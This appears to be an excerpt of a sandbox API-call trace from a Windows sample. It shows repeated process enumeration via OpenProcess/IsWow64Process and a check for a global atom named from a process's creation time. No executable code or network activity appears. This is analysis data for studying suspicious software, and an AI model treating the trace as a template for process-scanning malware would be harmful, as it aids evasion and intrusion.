	[0090.708] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.708] CloseHandle (hObject=0x20c) returned 1
	[0090.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.708] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.708] CloseHandle (hObject=0x20c) returned 1
	[0090.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.708] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.708] CloseHandle (hObject=0x20c) returned 1
	[0090.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.709] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.709] CloseHandle (hObject=0x20c) returned 1
	[0090.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.709] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.709] CloseHandle (hObject=0x20c) returned 1
	[0090.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.709] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.709] CloseHandle (hObject=0x20c) returned 1
	[0090.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.709] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.709] CloseHandle (hObject=0x20c) returned 1
	[0090.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.709] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.709] CloseHandle (hObject=0x20c) returned 1
	[0090.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.710] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.710] CloseHandle (hObject=0x20c) returned 1
	[0090.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.710] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.710] CloseHandle (hObject=0x20c) returned 1
	[0090.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.710] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.710] CloseHandle (hObject=0x20c) returned 1
	[0090.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.710] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.710] CloseHandle (hObject=0x20c) returned 1
	[0090.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.710] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.710] CloseHandle (hObject=0x20c) returned 1
	[0090.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.710] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.710] CloseHandle (hObject=0x20c) returned 1
	[0090.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.711] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.711] CloseHandle (hObject=0x20c) returned 1
	[0090.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.711] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.711] CloseHandle (hObject=0x20c) returned 1
	[0090.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.711] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.711] CloseHandle (hObject=0x20c) returned 1
	[0090.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.711] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.711] CloseHandle (hObject=0x20c) returned 1
	[0090.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.711] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.711] CloseHandle (hObject=0x20c) returned 1
	[0090.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.712] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.712] CloseHandle (hObject=0x20c) returned 1
	[0090.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.712] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.712] CloseHandle (hObject=0x20c) returned 1
	[0090.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.712] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.712] CloseHandle (hObject=0x20c) returned 1
	[0090.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.712] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.712] CloseHandle (hObject=0x20c) returned 1
	[0090.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.712] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.712] CloseHandle (hObject=0x20c) returned 1
	[0090.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.712] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.712] CloseHandle (hObject=0x20c) returned 1
	[0090.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.713] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.713] CloseHandle (hObject=0x20c) returned 1
	[0090.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.713] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.713] CloseHandle (hObject=0x20c) returned 1
	[0090.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.713] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.713] CloseHandle (hObject=0x20c) returned 1
	[0090.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.713] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.713] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.714] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.714] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.714] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.714] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.714] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.715] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.715] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.715] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.715] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.715] CloseHandle (hObject=0x20c) returned 1
	[0090.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.716] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.716] CloseHandle (hObject=0x20c) returned 1
	[0090.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.787] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.787] CloseHandle (hObject=0x20c) returned 1
	[0090.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.787] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.787] CloseHandle (hObject=0x20c) returned 1
	[0090.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.787] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.787] CloseHandle (hObject=0x20c) returned 1
	[0090.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.787] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.787] CloseHandle (hObject=0x20c) returned 1
	[0090.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.788] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.788] CloseHandle (hObject=0x20c) returned 1
	[0090.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.788] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.788] CloseHandle (hObject=0x20c) returned 1
	[0090.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.788] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.788] CloseHandle (hObject=0x20c) returned 1
	[0090.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.788] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.788] CloseHandle (hObject=0x20c) returned 1
	[0090.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.788] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.788] CloseHandle (hObject=0x20c) returned 1
	[0090.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.789] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.789] CloseHandle (hObject=0x20c) returned 1
	[0090.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.789] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.789] CloseHandle (hObject=0x20c) returned 1
	[0090.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.789] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.789] CloseHandle (hObject=0x20c) returned 1
	[0090.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.789] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.789] CloseHandle (hObject=0x20c) returned 1
	[0090.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.789] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.789] CloseHandle (hObject=0x20c) returned 1
	[0090.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.790] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.790] CloseHandle (hObject=0x20c) returned 1
	[0090.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.790] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.790] CloseHandle (hObject=0x20c) returned 1
	[0090.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.790] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.790] CloseHandle (hObject=0x20c) returned 1
	[0090.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.790] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.790] CloseHandle (hObject=0x20c) returned 1
	[0090.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.790] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.790] CloseHandle (hObject=0x20c) returned 1
	[0090.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.790] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.790] CloseHandle (hObject=0x20c) returned 1
	[0090.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.791] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.791] CloseHandle (hObject=0x20c) returned 1
	[0090.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.791] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.791] CloseHandle (hObject=0x20c) returned 1
	[0090.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.791] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.791] CloseHandle (hObject=0x20c) returned 1
	[0090.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.791] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.791] CloseHandle (hObject=0x20c) returned 1
	[0090.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.791] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.791] CloseHandle (hObject=0x20c) returned 1
	[0090.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.791] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.792] CloseHandle (hObject=0x20c) returned 1
	[0090.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.792] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.792] CloseHandle (hObject=0x20c) returned 1
	[0090.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.792] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.792] CloseHandle (hObject=0x20c) returned 1
	[0090.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.792] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.792] CloseHandle (hObject=0x20c) returned 1
	[0090.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.792] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.792] CloseHandle (hObject=0x20c) returned 1
	[0090.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.792] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.792] CloseHandle (hObject=0x20c) returned 1
	[0090.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.793] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.793] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.793] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.793] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.793] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.793] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.794] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.794] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.794] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.794] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.794] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.794] CloseHandle (hObject=0x20c) returned 1
	[0090.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.794] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.794] CloseHandle (hObject=0x20c) returned 1
	[0090.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.868] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.868] CloseHandle (hObject=0x20c) returned 1
	[0090.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.869] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.869] CloseHandle (hObject=0x20c) returned 1
	[0090.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.869] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.869] CloseHandle (hObject=0x20c) returned 1
	[0090.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.869] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.869] CloseHandle (hObject=0x20c) returned 1
	[0090.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.869] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.869] CloseHandle (hObject=0x20c) returned 1
	[0090.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.870] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.870] CloseHandle (hObject=0x20c) returned 1
	[0090.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.870] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.870] CloseHandle (hObject=0x20c) returned 1
	[0090.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.870] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.870] CloseHandle (hObject=0x20c) returned 1
	[0090.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.870] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.870] CloseHandle (hObject=0x20c) returned 1
	[0090.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
